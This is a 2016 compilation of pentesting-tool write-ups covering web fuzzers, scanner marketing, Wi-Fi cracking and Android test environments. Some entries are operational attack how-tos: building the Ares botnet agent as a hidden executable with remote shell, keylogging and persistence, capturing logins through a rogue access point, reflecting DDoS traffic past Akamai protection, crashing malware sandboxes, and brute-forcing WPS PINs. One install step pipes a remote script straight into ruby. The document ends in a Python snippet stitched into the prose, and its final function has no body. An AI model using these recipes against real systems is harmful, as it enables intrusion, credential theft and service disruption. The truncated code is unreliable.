
TOOLS FOR PENTESTERS

2016 COMPILATION

0D1N - TOOL FOR AUTOMATING CUSTOMIZED ATTACKS AGAINST WEB APPLICATIONS

Web security tool for fuzzing HTTP inputs, written in C with libcurl.
You can do:

brute force passwords in auth forms
directory disclosure (use a PATH list to brute-force, and check the HTTP status code)
test a list on an input to find SQL Injection and XSS vulnerabilities

To run:

requires libcurl-dev (or libcurl-devel on rpm-based Linux)

$ git clone https://github.com/CoolerVoid/0d1n/

needs libcurl to run

$ sudo apt-get install libcurl-dev

if rpm distro:
$ sudo yum install libcurl-devel

$ make
$ ./0d1n

3VILTWINATTACKER - CREATE ROGUE WI-FI ACCESS POINT AND SNOOPING ON THE TRAFFIC

This tool creates a rogue Wi-Fi access point, purporting to provide wireless Internet services, but snooping on the traffic.
Software dependencies:

Recommended to use Kali Linux.

Ettercap.
Sslstrip.
Airbase-ng (included in aircrack-ng).
DHCP.
Nmap.

Install DHCP on Debian-based systems

Ubuntu
$ sudo apt-get install isc-dhcp-server

Kali Linux
$ echo "deb http://ftp.de.debian.org/debian wheezy main" >> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server

Install DHCP on Red Hat-based systems

Fedora
$ sudo yum install dhcp

Tools Options:

Etter.dns: Edit etter.dns to load the dns spoof module.
Dns Spoof: Start a dns spoof attack on the fake AP interface ath0.
Ettercap: Start an ettercap attack on the hosts connected to the fake AP, capturing login credentials.
Sslstrip: sslstrip listens for the traffic on port 10000.
Driftnet: driftnet sniffs and decodes any JPEG TCP sessions, then displays them in a window.
Deauth Attack: Disconnect all devices connected to the AP (wireless network); alternatively, put a MAC address in the Client field and only that one client is disconnected from the access point.
Probe Request: Captures the probe requests of clients trying to connect to an AP. Probe requests can be sent by anyone with a legitimate Media Access Control (MAC) address, as association with the network is not required at this stage.
Mac Changer: Lets you easily spoof the MAC address; with a few clicks, users can change their MAC addresses.
Device FingerPrint: Lists the devices connected to the network with a mini fingerprint, i.e. information collected about a local computing device.
ACUNETIX CLAMPS DOWN ON COSTLY WEBSITE SECURITY WITH ONLINE SOLUTION

2nd March 2015 - London, UK - As cyber security continues to hit the headlines, even smaller companies can expect to be subject to scrutiny and therefore securing their website is more important than ever. In response to this, Acunetix are offering the online edition of their vulnerability scanner at a new lower entry price. This new option allows consumers to opt for the ability to scan just one target or website and is a further step in making the top of the range scanner accessible to a wider market.

A web vulnerability scanner allows the user to identify any weaknesses in their website architecture which might aid a hacker. They are then given the full details of the problem in order to fix it. While the scanner might previously have been a niche product used by penetration testers, security experts and large corporations, in our current cyber security climate, such products need to be made available to a wider market. Acunetix have recognised this, which is why both the product and its pricing have become more flexible and tailored to multiple types of user, with a one scan target option now available at $345. Pricing for other options has also been reduced by around 15% to reflect the current strength of the dollar. Use of the network scanning element of the product is also currently being offered completely free.

Acunetix CEO Nicholas Galea said: "Due to recent attacks such as the Sony hack and the Anthem Inc breach, companies are under increasing pressure to ensure their websites and networks are secure. We've been continuously developing our vulnerability scanner for a decade now, it's a pioneer in the field and continues to be the tool of choice for many security experts. We feel it's a tool which can benefit a far wider market which is why we developed the more flexible and affordable online version."
About Acunetix Vulnerability Scanner (Online version)

User-friendly and competitively priced, Acunetix Vulnerability Scanner fully interprets and scans websites, including HTML5 and JavaScript, and detects a large number of vulnerabilities, including SQL Injection and Cross Site Scripting, eliminating false positives. Acunetix beats competing products in many areas, including speed, the strongest support of modern technologies such as JavaScript, the lowest number of false positives and the ability to access restricted areas with ease. Acunetix also has the most advanced detection of WordPress vulnerabilities and a wide range of reports including HIPAA and PCI compliance.

Users can sign up for a trial of the online version of Acunetix which includes the option to run free network scans.
ACUNETIX ONLINE VULNERABILITY SCANNER

Acunetix Online Vulnerability Scanner acts as a virtual security officer for your company, scanning your websites, including integrated web applications, web servers and any additional perimeter servers for vulnerabilities. And allowing you to fix them before hackers exploit the weak points in your IT infrastructure!

Leverages Acunetix leading web application scanner

Building on Acunetix advanced web scanning technology, Acunetix OVS scans your website for vulnerabilities without requiring you to license, install and operate Acunetix Web Vulnerability Scanner. Acunetix OVS will deep scan your website with its legendary crawling capability including full HTML 5 support, and its unmatched SQL injection and Cross Site Scripting finding capabilities.

Unlike other online security scanners, Acunetix is able to find a much greater number of vulnerabilities because of its intelligent analysis engine; it can even detect DOM Cross-Site Scripting and Blind SQL Injection vulnerabilities, and with a minimum of false positives. Remember that in the world of web scanning it's not the number of different vulnerabilities that it can find, it's the depth with which it can check for vulnerabilities. Each scanner can find one or more SQL injection vulnerabilities, but few can find ALMOST ALL. Few scanners are able to find all pages and analyze all content, leaving large parts of your website unchecked. Acunetix will crawl the largest number of pages and analyze all content.
Utilizes OpenVAS for cutting edge network security scanning

And Acunetix OVS does not stop at web vulnerabilities. Recognizing the need to scan at network level and wanting to offer best of breed technology only, Acunetix has partnered with OpenVAS, the leading network security scanner. OpenVAS has been in development for more than 10 years and is backed by renowned security developers Greenbone. OpenVAS draws on a vulnerability database of thousands of network level vulnerabilities. Importantly, OpenVAS vulnerability databases are always up to date, boasting an average response rate of less than 24 hours for updating and deploying vulnerability signatures to scanners.
Start your scan today

Getting Acunetix on your side is easy: sign up in minutes, install the site verification code and your scan will commence. Scanning can take several hours, depending on the amount of pages and the complexity of the content. After completion, scan reports are emailed to you and Acunetix Security Consultants are on standby to explain the results and help you action remediation. For a limited time period, 2 full Network Scans are included for FREE in the 14-day trial.



ACUNETIX V10 - WEB APPLICATION SECURITY TESTING TOOL

Acunetix, the pioneer in automated web application security software, has announced the release of version 10 of its Vulnerability Scanner. New features are designed to prevent the risk of hacking for all customers; from small businesses up to large enterprises, including WordPress users, web application developers and pen testers.

With the number of cyber-attacks drastically up in the last year and the cost of breaches doubling, never has limiting this risk been such a high priority and a cost-effective investment. The 2015 Information Security Breaches Survey from PWC found 90% of large organisations had suffered a breach and average costs have escalated to over 3m per breach, at the higher end.

The areas of a website which are most likely to be attacked and are prone to vulnerabilities are those areas that require a user to login. Therefore the latest version of Acunetix vastly improves on its Login Sequence Recorder, which can now navigate multi-step authenticated areas automatically and with ease. It crawls at lightning speed with its DeepScan crawling engine now analyzing web applications developed using both Java Frameworks and Ruby on Rails. Version 10 also improves the automated scanning of RESTful and SOAP-based web services and can now detect over 1200 vulnerabilities in WordPress core and plugins.
Automated scanning of restricted areas

Latest automation functionality makes Acunetix not only even easier to use, but gives better peace of mind by ensuring the entire website is scanned. Restricted areas, especially user login pages, are more difficult for a scanner to access and often required manual intervention. The Acunetix Login Sequence Recorder overcomes this, having been significantly improved to allow restricted areas to be scanned completely automatically. This includes the ability to scan web applications that use Single Sign-On (SSO) and OAuth-based authentication. With the recorder following user actions rather than HTTP requests, it drastically improves support for anti-CSRF tokens, nonces or other one-time tokens, which are often used in restricted areas.
Top dog in WordPress vulnerability detection

With WordPress sites having exceeded 74 million in number, a single vulnerability found in the WordPress core, or even in a plugin, can be used to attack millions of individual sites. The flexibility of being able to use externally developed plugins leads to the development of even more vulnerabilities. Acunetix v10 now tests for over 1200 WordPress-specific vulnerabilities, based on the most frequently downloaded plugins, while still retaining the ability to detect vulnerabilities in custom built plugins. No other scanner on the market can detect as many WordPress vulnerabilities.
Support for various development architectures and web services

Many enterprise-grade, mission critical applications are built using Java Frameworks and Ruby on Rails. Version 10 has been engineered to accurately crawl and scan web applications built using these technologies. With the increase in HTML5 Single Page Applications and mobile applications, web services have become a significant attack vector. The new version improves support for SOAP-based web services with WSDL and WCF descriptions as well as automated scanning of RESTful web services using WADL definitions. Furthermore, version 10 introduces dynamic crawl pre-seeding by integrating with external, third-party tools including Fiddler, Burp Suite and the Selenium IDE to enhance Business Logic Testing and the workflow between Manual Testing and Automation.
Detection of Malware and Phishing URLs

Acunetix WVS 10 will ship with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs. The Malware Detection Service makes use of the Google and Yandex Safe Browsing Database.

New in Acunetix Vulnerability Scanner v10

'Login Sequence Recorder' has been re-engineered from the ground-up to allow restricted areas to be scanned entirely automatically.
Now tests for over 1200 WordPress-specific vulnerabilities in the WordPress core and plugins.
Acunetix WVS Crawl data can be augmented using the output of: Fiddler .saz files, Burp Suite saved items, Burp Suite state files, HTTP Archive (.har) files, Acunetix HTTP Sniffer logs, Selenium IDE Scripts.
Improved support for Java Frameworks (Java Server Faces [JSF], Spring and Struts) and Ruby on Rails.
Increased web services support for web applications which make use of WSDL based web-services, Microsoft WCF-based web services and RESTful web services.
Ships with a malware URL detection service, which is used to analyse all the external links found during a scan against a constantly updated database of Malware and Phishing URLs.

AIRCRACK-NG 1.2 RC 2 - WEP AND WPA-PSK KEYS CRACKING PROGRAM

Here is the second release candidate. Along with a LOT of fixes, it improves the support for the Airodump-ng scan visualizer. Airmon-zc is mature and is now renamed to Airmon-ng. Also, Airtun-ng is now able to encrypt and decrypt WPA on top of WEP. Another big change is that recent versions of GPSd now work very well with Airodump-ng.

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.

Aircrack-ng is the next generation of aircrack with lots of new features:

Better documentation (wiki, manpages) and support (Forum, trac, IRC: #aircrack-ng on Freenode).
More cards/drivers supported
More OS and platforms supported
PTW attack
WEP dictionary attack
Fragmentation attack
WPA Migration mode
Improved cracking speed
Capture with multiple cards
New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng, easside-ng, airserv-ng, airolib-ng, airdriver-ng, airbase-ng, tkiptun-ng and airdecloak-ng
Optimizations, other improvements and bug fixing

AIRCRACK-NG 1.2 RC 3 - WEP AND WPA-PSK KEYS CRACKING PROGRAM

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.

Third release candidate and hopefully this should be the last one. It contains a ton of bug fixes, code cleanup, improvements and compilation fixes everywhere. Some features were added: AppArmor profiles, better FreeBSD support, including an airmon-ng for FreeBSD.
AIRCRACK-NG CHANGELOG

Version 1.2-rc3 (changes from aircrack-ng 1.2-rc2) - Released 21 Nov 2015:

Airodump-ng: Prevent sending signal to init which caused the system to reboot/shutdown.
Airbase-ng: Allow to use a user-specified ANonce instead of a randomized one when doing the 4-way handshake.
Aircrack-ng: Fixed compilation warnings.
Aircrack-ng: Removed redundant NULL check and fixed typo in another one.
Aircrack-ng: Workaround for segfault when compiling aircrack-ng with clang and gcrypt and running a check.
Airmon-ng: Created version for FreeBSD.
Airmon-ng: Prevent passing invalid values as channel.
Airmon-ng: Handle udev renaming interfaces.
Airmon-ng: Better handling of rfkill.
Airmon-ng: Updated OUI URL.
Airmon-ng: Fix VM detection.
Airmon-ng: Make lsusb optional if there doesn't seem to be a usb bus. Improve pci detection slightly.
Airmon-ng: Various cleanup and fixes (including wording and typos).
Airmon-ng: Display iw errors.
Airmon-ng: Improved handling of non-monitor interfaces.
Airmon-ng: Fixed error when running 'check kill'.
Airdrop-ng: Display error instead of stack trace.
Airmon-ng: Fixed bashism.
Airdecap-ng: Allow specifying output file names.
Airtun-ng: Added missing parameter to help screen.
Besside-ng-crawler: Removed reference to darkircop.org (non-existent subdomain).
Airgraph-ng: Display error when no graph type is specified.
Airgraph-ng: Fixed make install.
Manpages: Fixed, updated and improved airodump-ng, airmon-ng, aircrack-ng, airbase-ng and aireplay-ng manpages.
Aircrack-ng GUI: Fixes issues with wordlists selection.
OSdep: Add missing RADIOTAP_SUPPORT_OVERRIDES check.
OSdep: Fix possible infinite loop.
OSdep: Use a default MTU of 1500 (Linux only).
OSdep: Fixed compilation on OSX.
AppArmor: Improved and added profiles.
General: Fixed warnings reported by clang.
General: Updated TravisCI configuration file.
General: Fixed typos in various tools.
General: Fixed clang warning about 'gcry_thread_cbs()' being deprecated with gcrypt > 1.6.0.
General: Fixed compilation on cygwin due to undefined reference to GUID_DEVCLASS_NET.
General: Fixed compilation with musl libc.
General: Improved testing and added test cases (make check).
General: Improved mutexes handling in various tools.
General: Fixed memory leaks, use after free, null termination and return values in various tools and OSdep.
General: Fixed compilation on FreeBSD.
General: Various fixes and improvements to README (wording, compilation, etc).
General: Updated copyrights in help screen.

ANTICUCKOO - A TOOL TO DETECT AND CRASH CUCKOO SANDBOX

A tool to detect and crash Cuckoo Sandbox. Tested in Cuckoo Sandbox Official and Accuvant's Cuckoo version.

Features

Detection:
Cuckoo hooks detection (all kinds of cuckoo hooks).
Suspicious data in own memory (without APIs, page per page scanning).
Crash (execute with arguments; outside a sandbox these args don't crash the program):
-c1: Modify the RET N instruction of a hooked API with a higher value. The next call to the API pushes more args onto the stack. If the hooked API is called from Cuckoo's HookHandler the program crashes, because it only pushes the real API args, so the modified RET N instruction corrupts the HookHandler's stack.

The overkill methods can be useful. For example, using the overkill methods you have two features in one: detection/crash and "a kind of Sleep" (Cuckoomon bypass of long Sleep calls).
Cuckoo Detection

Submit Release/anticuckoo.exe for analysis in Cuckoo Sandbox. Check the screenshots (console output). You can also check Accessed Files in the Summary:

Accessed Files in Summary (django web):

Cuckoo Crash

Specify the crash argument in the submit options, e.g. -c1 (via django web):

And check the Screenshots (or connect via RDP and see what is on the connection) to verify the crash. E.g. -c1 via RDP:

APPCRASHVIEW - VIEW APPLICATION CRASHES (.WER FILES)

AppCrashView is a small utility for Windows Vista and Windows 7 that displays the details of all application crashes that occurred on your system. The crash information is extracted from the .wer files created by the Windows Error Reporting (WER) component of the operating system every time a crash occurs. AppCrashView also allows you to easily save the crashes list to a text/csv/html/xml file.

System Requirements

For now, this utility only works on Windows Vista, Windows 7, and Windows Server 2008, simply because the earlier versions of Windows don't save the crash information into .wer files. It's possible that in future versions, I'll also add support for Windows XP/2000/2003 by using Dr. Watson (Drwtsn32.exe) or another debug component that captures the crash information.

Using AppCrashView

AppCrashView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - AppCrashView.exe. The main window of AppCrashView contains 2 panes. The upper pane displays the list of all crashes found on your system, while the lower pane displays the content of the crash file that you select in the upper pane.
You can select one or more crashes in the upper pane, and then save them (Ctrl+S) into a text/html/xml/csv file or copy them to the clipboard, and paste them into Excel or another spreadsheet application.
Command-Line Options

/ProfilesFolder <Folder>
Specifies the user profiles folder (e.g: c:\users) to load. If this parameter is not specified, the profiles folder of the current operating system is used.

/ReportsFolder <Folder>
Specifies the folder that contains the WER files you wish to load.

/ShowReportQueue <0 | 1>
Specifies whether to enable the 'Show ReportQueue Files' option. 1 = enable, 0 = disable

/ShowReportArchive <0 | 1>
Specifies whether to enable the 'Show ReportArchive Files' option. 1 = enable, 0 = disable

/stext <Filename>
Save the list of application crashes into a regular text file.

/stab <Filename>
Save the list of application crashes into a tab-delimited text file.

/scomma <Filename>
Save the list of application crashes into a comma-delimited text file (csv).

/stabular <Filename>
Save the list of application crashes into a tabular text file.

/shtml <Filename>
Save the list of application crashes into an HTML file (Horizontal).

/sverhtml <Filename>
Save the list of application crashes into an HTML file (Vertical).

/sxml <Filename>
Save the list of application crashes into an XML file.

/sort <column>
This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Event Name" and "Process File". You can specify the '~' prefix character (e.g: "~Event Time") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
AppCrashView.exe /shtml "f:\temp\crashlist.html" /sort 2 /sort ~1
AppCrashView.exe /shtml "f:\temp\crashlist.html" /sort "Process File"

/nosort
When you specify this command-line option, the list will be saved without any sorting.

APPIE - ANDROID PENTESTING PORTABLE INTEGRATED ENVIRONMENT

Appie is a software package that has been pre-configured to function as an Android Pentesting Environment. It is completely portable and can be carried on a USB stick. This is a one stop answer for all the tools needed in Android Application Security Assessment.

Difference between Appie and existing environments?
Tools contained in Appie are running on the host machine instead of running on a virtual machine.
Less Space Needed (Only 600MB compared to at least 8GB for a Virtual Machine)
As the name suggests it is completely Portable, i.e. it can be carried on a USB Stick or on your own smartphone and your pentesting environment will go wherever you go without any differences.
Awesome Interface

Which tools are included in Appie?

Drozer
dex2jar
Androguard
Introspy-Analyzer
Jd-Gui
Android Debug Bridge
Apktool
Sublime Text
Androguard SublimeText Plugin
Eclipse with Android Developer Tools
Owasp GoatDroid Project Configured
Fastboot and sqlite3
Java Runtime Environment and Python Files. With these you don't even need to have Python or Java Runtime Environment installed on the computer.
Nearly all UNIX commands like ls, cat, chmod, cp, find, git, unzip, mkdir, ssh, openssl, keytool, jarsigner and many others

APPUSE - ANDROID PENTEST PLATFORM UNIFIED STANDALONE ENVIRONMENT

AppUse Virtual Machine, developed by AppSec Labs, is a unique (and free) system, a platform for mobile application security testing in the Android environment, and it includes unique custom-made tools.

Faster & More Powerful

The system is a blessing to security teams, who from now on can easily perform security tests on Android applications. It was created as a virtual machine targeted at penetration testing teams who are interested in a convenient, personalized platform for Android application security testing, for catching security problems and analysis of the application traffic.
Now, in order to test Android applications, all you will need is to download AppUse Virtual Machine, activate it, load your application and test it.

Easy to Use

There is no need for installation of simulators and testing tools, no need for SSL certificates of the proxy software, everything comes straight out of the box pre-installed and configured for an ideal user experience.
Security experts who have seen the machine were very excited, calling it the next BackTrack (a famous system for testing security problems), specifically adjusted for Android application security testing.
AppUse VM closes gaps in the world of security: now there is a special and customized testing environment for Android applications; an environment like this has not been available until today, certainly not with the rich format offered today by AppUse VM.

This machine is intended for the daily use of security testers everywhere for Android applications, and is a must-have tool for any security person.
We at AppSec Labs do not stagnate, specifically at a time in which so many cyber attacks take place; we consider it our duty to assist the public and enable quick and effective security testing.
As a part of AppSec Labs policy to promote application security in general, and specifically mobile application security, AppUse is offered as a free download on our website, in order to share the knowledge, experience and investment with the data security community.

Features

New Application Data Section
Tree-view of the applications folder/file structure
Ability to pull files
Ability to view files
Ability to edit files
Ability to extract databases
Dynamic proxy managed via the Dashboard
New application-reversing features
Updated ReFrameworker tool
Dynamic indicator for Android device status
Bugs and functionality fixes

ARDT - AKAMAI REFLECTIVE DDOS TOOL

Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.

How it works...

Based off the research done at NCC: ( https://dl.packetstormsecurity.net/papers/attack/the_pentesters_guide_to_akamai.pdf )

Akamai boast around 100,000 edge nodes around the world which offer load balancing, web application firewall, caching etc, to ensure that a minimal amount of requests actually hit the origin web-server being protected. However, the issue with caching is that you cannot cache something that is non-deterministic, i.e. a search result. A search that has not been requested before is likely not in the cache, and will result in a Cache-Miss, and the Akamai edge node requesting the resource from the origin server itself.

What this tool does is, provided a list of Akamai edge nodes and a valid cache-missing request, produce multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with a 100,000 Akamai edge node list, and a request which results in 10KB hitting the origin, if my calculations are correct, that's around 976MB/ps hitting the origin server, which is a hell of a lot of traffic.

Finding Akamai Edge Nodes

To find Akamai Edge Nodes, the following script has been included:
# python ARDT_Akamai_EdgeNode_Finder.py

This can be edited quite easily to find more; it then saves the IPs automatically.

ARES - PYTHON BOTNET AND BACKDOOR

Ares is made of two main programs:

A Command aNd Control server, which is a Web interface to administer the agents
An agent program, which is run on the compromised host, and ensures communication with the CNC

The Web interface can be run on any server running Python. You need to install the cherrypy package.
The client is a Python program meant to be compiled as a win32 executable using pyinstaller. It depends on the requests, pythoncom, pyhook python modules and on PIL (Python Imaging Library).
It currently supports:
remote cmd.exe shell
persistence
file upload/download
screenshot
key logging

INSTALLATION

SERVER

To install the server, first create the sqlite database:

cd server/
python db_init.py

If not installed, install the cherrypy python package.
Then launch the server by issuing: python server.py
By default, the server listens on http://localhost:8080

AGENT

The agent can be launched as a python script, but it is ultimately meant to be compiled as a win32 executable using pyinstaller.
First, install all the dependencies:
requests
pythoncom
pyhook
PIL
Then, configure agent/settings.py according to your needs:
SERVER_URL = URL of the CNC http server
BOT_ID = the (unique) name of the bot, leave empty to use the hostname
DEBUG = should debug messages be printed to stdout?
IDLE_TIME = time of inactivity before going into idle mode (the agent checks the CNC for commands far less often when idle).
REQUEST_INTERVAL = interval between each query to the CNC when active
Finally, use pyinstaller to compile the agent into a single exe file:
cd client/
pyinstaller --onefile --noconsole agent.py


ASHTTP - SHELL COMMAND TO EXPOSE ANY OTHER COMMAND AS HTTP

ashttp provides a simple way to expose any shell command over HTTP. For example, to expose top over HTTP, try: ashttp -p8080 top ; then try http://localhost:8080.

Dependencies

ashttp depends on hl_vt100, a headless VT100 emulator.

To get and compile hl_vt100:
$ git clone https://github.com/JulienPalard/vt100-emulator.git
$ aptitude install python-dev
$ make python_module
$ python setup.py install

Usage

ashttp can serve any text application over HTTP, like:

$ ashttp -p 8080 top

to serve a top on port 8080

$ ashttp -p 8080 watch -n 1 ls -lah /tmp

to serve a continuously updated directory listing of /tmp

ATSCAN - SERVER, SITE AND DORK SCANNER

DESCRIPTION:

ATSCAN Version 2
Dork scanner.
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites on the server.
Find Admin page.
Decode / Encode MD5 + Base64.

LIBRARIES TO INSTALL:
apt-get install libxml-simple-perl

NOTE: Works on linux platforms.

PERMISSIONS & EXECUTION:
$ chmod +x atscan.pl
$ perl ./atscan.pl

SCREENSHOTS:

AUTOBROWSER - CREATE REPORT AND SCREENSHOTS OF HTTP/S BASED PORTS ON THE NETWORK

AutoBrowser is a tool written in python for penetration testers. The purpose of this tool is to create a report and screenshots of http/s based ports on the network. It analyzes an Nmap report or scans with Nmap, checks the results with an http/s request on each host using a headless web browser, and grabs a screenshot of the response page content.
This tool is designed for IT professionals to perform penetration testing to scan and analyze NMAP results.

Proof of concept video (From version: 2.0)


Examples

Values in the CLI arguments must be delimited by double quotes only!

Get the argument details of the scan method: python AutoBrowser.py scan --help

Scan with Nmap, check the results and create a folder named project_name: python AutoBrowser.py scan "192.168.1.1/24" -a="-sT -sV -T3" -p project_name

Get the argument details of the analyze method: python AutoBrowser.py analyze --help

Analyze an Nmap XML report and create a folder named report_analyze: python AutoBrowser.py analyze nmap_file.xml --project report_analyze

Requirements:

Linux Installation:
1. sudo apt-get install python-pip python2.7-dev libxext-dev python-qt4 qt4-dev-tools build-essential nmap
2. sudo pip install -r requirements.txt

MacOSx Installation:
1. Install Xcode Command Line Tools (AppStore)
2. ruby -e "$(curl -fsSL https://raw.github.com/mxcl/homebrew/go)"
3. brew install pyqt nmap
4. sudo easy_install pip
5. sudo pip install -r requirements.txt

Windows Installation:
1. Install setuptools
2. Install pip
3. Install PyQt4
4. Install Nmap
5. Open Command Prompt (cmd) as Administrator -> Go to the python folder -> Scripts (cd c:\Python27\Scripts)
6. pip install -r (Full Path To requirements.txt)

Download AutoBrowser
AUTOREAVER - MULTIPLE ACCESS POINT TARGETS
ATTACK USING REAVER
AutoReaver is a bash script which provides multiple access point
attack using reaver and a BSSID list from a text file.
If the processed AP reaches its rate limit, the script moves on to
the next one on the list, and so forth.
HOW IT WORKS?

The script takes the AP target list from a text file in the following format:

BSSID CHANNEL ESSID

For example:
AA:BB:CC:DD:EE:FF 1 MyWlan
00:BB:CC:DD:EE:FF 13 TpLink
00:22:33:DD:EE:FF 13 MyHomeSSID

And then the following steps are processed:

Every line of the list file is checked separately in a for loop.
After every AP on the list has been tried once, the script automatically
changes the MAC address of your card to a random MAC using
macchanger (you can also set up your own MAC if you need).
The whole list is checked again and again in an endless while
loop; when there is nothing left to check, the loop is stopped.
Found PINs/WPA passphrases are stored in the
{CRACKED_LIST_FILE_PATH} file.

REQUIREMENTS

Wireless adapter which supports injection (see
https://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers
Reaver Wiki)
Linux Backtrack 5
Root access on your system (otherwise some things may not work)
AND if you use another Linux distribution*:
Reaver 1.4 (I didn't try it with previous versions)
KDE (unless you'll change 'konsole' invocations to 'screen',
'gnome-terminal' or something like that... this is easy)
Gawk (GNU AWK)
Macchanger
Airmon-ng, Airodump-ng, Aireplay-ng
Wash (WPS Service Scanner)
Perl

USAGE EXAMPLE

First you have to download the latest version:
git clone https://code.google.com/p/auto-reaver/

Go to the auto-reaver directory:
cd ./auto-reaver

Make sure that the scripts have x permissions for your user; if not, run:
chmod 700 ./washAutoReaver
chmod 700 ./autoReaver

Run the wash scanner to make a formatted list of access points
with the WPS service enabled:
./washAutoReaverList > myAPTargets

Wait 1-2 minutes for wash to collect APs, and hit CTRL+C
to kill the script. Check if any APs were detected:
cat ./myAPTargets

If there are targets in the myAPTargets file, you can proceed with the
attack, with the following command:
./autoReaver myAPTargets

ADDITIONAL FEATURES

The script logs the dates of PIN attempts, so you can check how
often an AP is locked and for how long. The default directory for
those logs is ReaverLastPinDates.
The script logs the rate limit for every AP (the default
directory is /tmp/APLimitBSSID), so you can easily check
when the last rate limit occurred.
You can set up your attack using variables from the
configurationSettings file (sleep/wait times between APs
and loops, etc.).
You can disable checking an AP by adding a "#" sign at the
beginning of its line in the myAPTargets file (the AP will then be
omitted in the loop).
(added 2014-07-03) You can set up specific settings per
access point.
To do that for the AP with MAC AA:BB:CC:DD:EE:FF, just
create the file ./configurationSettingsPerAp/AABBCCDDEEFF
and put there the variables from the ./configurationSettings file
that you want to change, for example:
ADDITIONAL_OPTIONS="-g 10 -E -S -N -T 1 -t 15 -d 0 -x 3";

so AA:BB:CC:DD:EE:FF will have only ADDITIONAL_OPTIONS changed
(the rest of the variables from the ./configurationSettings file
remain unchanged).
You can define the channel as random by setting its value (in the
myAPTargets file) to R; this forces the script to automatically
find the AP channel.
Example:

AA:BB:CC:DD:EE:FF R MyWlan

But remember that you probably should also increase the value of the
BSSID_ONLINE_TIMEOUT variable, since hopping between all
channels takes much more time than searching on one
channel.

Download AutoReaver
AUTORIZE - AUTOMATIC AUTHORIZATION
ENFORCEMENT DETECTION (EXTENSION FOR BURP
SUITE)

Autorize is an automatic authorization enforcement detection
extension for Burp Suite. It was written in Python by Barak
Tawily, an application security expert at AppSec Labs. Autorize
was designed to help security testers by performing automatic
authorization tests.

Installation

1. Download Burp Suite (obviously): http://portswigger.net/burp/download.html
2. Download Jython standalone JAR: http://www.jython.org/downloads.html
3. Open Burp -> Extender -> Options -> Python Environment
-> Select File -> Choose the Jython standalone JAR
4. Install Autorize from the BApp Store or follow these steps:
5. Download the Autorize.py file.
6. Open Burp -> Extender -> Extensions -> Add -> Choose the
Autorize.py file.
7. See the Autorize tab and enjoy automatic authorization
detection :)
User Guide - How to use?

1. After installation, the Autorize tab will be added to Burp.
2. Open the configuration tab (Autorize -> Configuration).
3. Get your low-privileged user's authorization token header
(Cookie / Authorization) and copy it into the textbox
containing the text "Insert injected header here".
4. Click on "Intercept is off" to start intercepting the traffic in
order to allow Autorize to check for authorization
enforcement.
5. Open a browser and configure the proxy settings so the
traffic will be passed to Burp.
6. Browse to the application you want to test with a high
privileged user.
7. The Autorize table will show you the request's URL and
enforcement status.
8. It is possible to click on a specific URL and see the
original/modified request/response in order to investigate
the differences.
Authorization Enforcement Status

There are 3 enforcement statuses:

1. Authorization bypass! - Red color
2. Authorization enforced! - Green color
3. Authorization enforced??? (please configure enforcement
detector) - Yellow color

The first 2 statuses are clear, so I won't elaborate on them.
The 3rd status means that Autorize cannot determine whether
authorization is enforced or not, so Autorize will ask you to
configure a filter in the enforcement detector tab.
The enforcement detector filters allow Autorize to detect
authorization enforcement by fingerprint (string in the message
body) or content-length of the server's response.
For example, if a request's enforcement status is
detected as "Authorization enforced??? (please configure
enforcement detector)", it is possible to investigate the modified/
original response and see that the modified response body
includes the string "You are not authorized to perform action".
You can then add a filter with the fingerprint value "You are not
authorized to perform action", so Autorize will look for this
fingerprint and automatically detect that authorization is
enforced. The same can be done by defining a content-length filter.
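The three statuses and the two filter kinds described above, as an added example written for this page (it is not Autorize's own code): a small classifier that compares the response the high-privileged user received with the response to the same request replayed under the low-privileged session header, and applies fingerprint and content-length filters before deciding. The order of the checks, the `Response` and `EnforcementDetector` types, and the sample response bodies are assumptions made for this example.

```python
"""Classify authorization enforcement from an original/replayed response pair.

Added example, not Autorize's own code. `original` is the response to the
high-privileged user's request; `modified` is the response to the same
request replayed with the low-privileged session header. The detector
filters model the "enforcement detector" tab: a fingerprint filter is a
substring found in the body of a denied response, a content-length filter is
the exact Content-Length such a response carries. All names and sample
data below are constructed for this example.
"""
from dataclasses import dataclass, field

BYPASS = "Authorization bypass!"                                               # red
ENFORCED = "Authorization enforced!"                                           # green
UNKNOWN = "Authorization enforced??? (please configure enforcement detector)"  # yellow


@dataclass
class Response:
    status: int
    body: str

    @property
    def content_length(self) -> int:
        return len(self.body.encode("utf-8"))


@dataclass
class EnforcementDetector:
    """Filters that identify the application's 'access denied' response."""
    fingerprints: list = field(default_factory=list)    # substrings of the body
    content_lengths: set = field(default_factory=set)   # exact body lengths

    def matches(self, resp: Response) -> bool:
        if any(f in resp.body for f in self.fingerprints):
            return True
        return resp.content_length in self.content_lengths


def classify(original: Response, modified: Response, detector: EnforcementDetector) -> str:
    """Return one of the three statuses for a single request."""
    # A configured filter matching the replayed response is the strongest
    # signal: the low-privileged session received the known denial page.
    if detector.matches(modified):
        return ENFORCED
    # Same status and same body as the privileged user got: the server did
    # not distinguish the two sessions, so the authorization check is missing.
    if modified.status == original.status and modified.body == original.body:
        return BYPASS
    # The responses differ but nothing identifies a denial (it could be a
    # redirect, an error page or a reduced view), so a filter is needed.
    return UNKNOWN


def demo() -> dict:
    """Run the classifier over constructed cases; keys name the scenario."""
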